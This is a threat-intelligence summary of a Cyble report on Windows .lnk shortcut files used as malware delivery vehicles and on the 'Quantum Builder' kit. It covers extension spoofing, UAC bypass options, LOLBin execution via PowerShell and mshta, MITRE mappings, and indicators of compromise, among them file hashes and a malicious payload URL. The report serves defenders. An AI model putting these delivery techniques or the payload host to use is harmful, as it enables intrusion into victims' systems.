Threat Research

Cyble – Quantum Software:  LNK File-based Builders Growing In Popularity

Securonix

Cyble Research Labs highlights a rise in using Windows .lnk shortcut files to deliver payloads via LOLBins like PowerShell and mshta, including a new “Quantum Builder” tool that can create .lnk, .hta, and .iso-based payloads. The report also notes potential Lazarus APT links and details an infection chain, from LNK execution to deobfuscated PowerShell and remote-host mshta payloads. Hashtags: #QuantumSoftware #QuantumBuilder #LazarusAPT #LNK #MSDT #MSHTA #PowerShell #LOLBins #quantum-software.online

Keypoints

  • surge in use of Windows .lnk shortcut files by multiple malware families and APTs for payload delivery
  • Quantum Builder tool can spoof extensions and offers 300+ icons to disguise malicious .lnk files
  • builder workflow bundles .lnk/.hta/.iso generation and embeds payloads, including configurable options like UAC bypass and execution timing
  • attacker demonstrations show .hta payloads created via Quantum Builder and delivered through .lnk files
  • MSDT-related dogwalk vulnerability is cited as a LolBin-based delivery path via specially crafted .diagcab files
  • observed similarities between Quantum Builder scripts and Lazarus APT techniques, suggesting potential links

MITRE Techniques

  • [T1566] Phishing – Initial Access via email-distributed payloads and malicious .diagcab files used to deliver payloads. Quote: “typically sent over emails by TAs.”
  • [T1204] User Execution – Execution requiring user interaction to open attachments or progress in the infection chain. Quote: “the MSDT zero-day vulnerability, which researchers recently discovered, was also exploiting a LOLBin.”
  • [T1059] Command and Scripting Interpreter – Execution via PowerShell scripts deobfuscated and run as part of the payload. Quote: “The script uses a function that deobfuscates the malicious PowerShell script.”
  • [T1218] System Binary Proxy Execution – LOLBins like PowerShell and mshta used to proxy execution and evade detection. Quote: “Living off the Land Binaries are binaries that are native to Operating Systems such as PowerShell and mshta.”
  • [T1140] Deobfuscate/Decode Files or Information – The PowerShell payload is deobfuscated before execution. Quote: “The function performs a mathematical operation that converts a numeric value into characters.”

Indicators of Compromise

  • [MD5] context – example1, example2, and other items: 04e8a5c6e5797b0f436ca36452170a2f, 52b0b06ab4cf6c6b1a13d8eec2705e3b
  • [SHA-256] context – example1, example2, and other items: 2f6c1def83936139425edfd611a5a1fbaa78dfd3997efec039f9fd3338360d25, b9899082824f1273e53cbf1d455f3608489388672d20b407338ffeecefc248f1
  • [Domain] Malicious domain – quantum-software.online/remote/bdg.hta (and related demo site usage). Quote: “The sample mentioned in the above post connects to a domain named “quantum-software.online”.”

Read more: https://blog.cyble.com/2022/06/22/quantum-software-lnk-file-based-builders-growing-in-popularity/